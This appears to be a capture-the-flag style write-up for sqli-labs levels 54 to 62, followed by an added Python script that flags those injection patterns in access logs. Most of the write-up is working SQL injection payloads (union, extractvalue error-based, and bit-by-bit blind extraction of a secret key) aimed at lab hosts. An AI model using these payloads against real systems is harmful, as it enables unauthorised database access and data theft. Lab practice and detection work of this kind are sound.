less-54
Find the database
Find the table
Find the columns
Dump the data
less-55
This level is almost the same as less-54, with one extra ) needed to close the bracket.
Find the table
less-56
http://192.168.211.145/sqli/Less-56/index.php?id=1')%23 // closes the context successfully
less-57
http://192.168.211.145/sqli/Less-57/?id=-1" union select 1,database(),3%23
less-58
Use the extractvalue() function for error-based injection.
Find the table
Find the columns
less-59 (compare with less-58)
The query is:
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
so the payload is:
?id=1 and extractvalue(1,concat(0x7e,(select database())))%23
less-60
The difference from the previous level is:
$id = '("'.$id.'")';
The attack payload is as follows:
http://192.168.211.145/sqli/Less-60/?id=1") and extractvalue(1, concat(0x5c, (select database())))%23
less-61
http://192.168.211.145/sqli/Less-61/?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23
less-62
The ord() function
ord() returns the ASCII value of the first character of a string.
Solution:
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
// first character of the table name: w
// wlo99z7cua
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
// 10110 = 22, fourth character from the end of the column name: V
// secret_VUBV
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+
https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
// first character of the key: 1
// 1kqTprKdfAt6VGFEoEcpYgjG
Note: these values are random.
Table name: 10 characters, lowercase letters and digits.
secret_XXXX: the last four characters are uppercase letters and digits.
Key: 24 characters, upper- and lowercase letters and digits.
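As a defensive counterpart to the payloads above, the following is an added example (not part of the original write-up or of sqli-labs): a small Python scanner that decodes access-log request lines and flags the injection shapes used from less-54 to less-62, namely quote/parenthesis context breaks, union select, extractvalue error-based, ascii/ord + substr boolean-blind, information_schema enumeration and a trailing # or -- comment. The sample log lines are constructed from the lab URLs shown above; the rule names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log request lines, shaped after the lab URLs in this write-up
# (the first one is a benign baseline, the rest mirror the less-56/57/60/62 payloads).
SAMPLE_REQUESTS = [
    "GET /sqli/Less-56/index.php?id=1 HTTP/1.1",
    "GET /sqli/Less-56/index.php?id=1')%23 HTTP/1.1",
    "GET /sqli/Less-57/?id=-1%22%20union%20select%201,database(),3%23 HTTP/1.1",
    "GET /sqli/Less-60/?id=1%22)%20and%20extractvalue(1,%20concat(0x5c,%20(select%20database())))%23 HTTP/1.1",
    "GET /sqli-lab/Less-62/index.php?id=1')%20and%20(ord(substr((select%20column_name%20from%20"
    "information_schema.columns%20limit%202,1),8,1))%20%26%2016)%20=%2016%20--+ HTTP/1.1",
]

# Each rule names one injection shape seen in the levels above; checked on the decoded value.
RULES = [
    ("context_break", re.compile(r"^-?\d+\s*['\")]")),                        # 1')  1")  1'))  -1"
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("error_based_xml", re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)),
    ("boolean_blind_char", re.compile(r"\b(?:ascii|ord)\s*\(\s*substr(?:ing)?\s*\(", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("comment_terminator", re.compile(r"(?:#|--\s)\s*$")),                     # %23 or --+ tail
]


def classify_value(value):
    """Return the names of all rules that match one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def classify_request(line):
    """Map each query parameter of an access-log request line to the rules it triggers."""
    parts = line.split(" ")
    target = parts[1] if len(parts) > 1 else parts[0]
    query = urlsplit(target).query
    hits = {}
    # parse_qs splits on '&' before decoding, so an encoded %26 stays inside the value
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            matched = classify_value(value)
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits


def scan(lines):
    """Return (line_number, hits) for every request that triggers at least one rule."""
    results = []
    for lineno, line in enumerate(lines, 1):
        hits = classify_request(line)
        if hits:
            results.append((lineno, hits))
    return results


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_REQUESTS):
        print(f"line {lineno}: {hits}")
```

The rules match the decoded parameter value, so encoded variants (%27, %22, %23, --+) are caught the same way as the raw forms used in the lab URLs.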
less-62 to less-65 in detail
less-54-less-65